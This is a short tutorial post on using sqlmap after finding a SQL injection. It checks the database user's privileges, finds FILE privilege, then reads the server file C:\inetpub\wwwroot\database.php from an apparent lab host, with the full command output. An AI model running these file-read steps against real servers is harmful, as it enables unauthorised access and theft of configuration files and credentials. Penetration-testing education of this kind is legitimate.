Hi Guys,
There is a time where you found vulnerability on the server related to SQL injection and want to leverage the attack to get more information from the server.
Basically, SQLMap provide you with capabilities to read file from the server when you have enough privilege. To check wether you have the privilege by using this command
sqlmap -r header-req --current-user --privileges
[*] 'hector'@'localhost' (administrator) [29]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DELETE HISTORY
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
If you see that you have got that FILE privilege then you are able to read some file on the server with this below sample
sqlmap -r header-req --file-read=C:\\inetpub\\wwwroot\\database.php
[18:31:20] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[18:31:20] [INFO] fingerprinting the back-end DBMS operating system
[18:31:20] [INFO] the back-end DBMS operating system is Windows
[18:31:20] [INFO] fetching file: 'C:/inetpub/wwwroot/database.php'
[18:31:21] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[18:31:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:31:28] [WARNING] unable to retrieve the content of the file 'C:/inetpub/wwwroot/database.php', going to fall-back to simpler UNION technique
[18:31:28] [INFO] fetching file: 'C:/inetpub/wwwroot/database.php'
do you want confirmation that the remote file 'C:/inetpub/wwwroot/database.php' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[18:31:33] [INFO] the local file '/root/.sqlmap/output/10.10.10.167/files/C__inetpub_wwwroot_database.php' and the remote file 'C:/inetpub/wwwroot/database.php' have the same size (904 B)
files saved to [1]:
[*] /root/.sqlmap/output/10.10.10.167/files/C__inetpub_wwwroot_database.php (same file)
[18:31:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[*] ending @ 18:31:33 /2020-05-25/
You can see the file database.php at the specified path was able to be downloaded and stored in our machine.
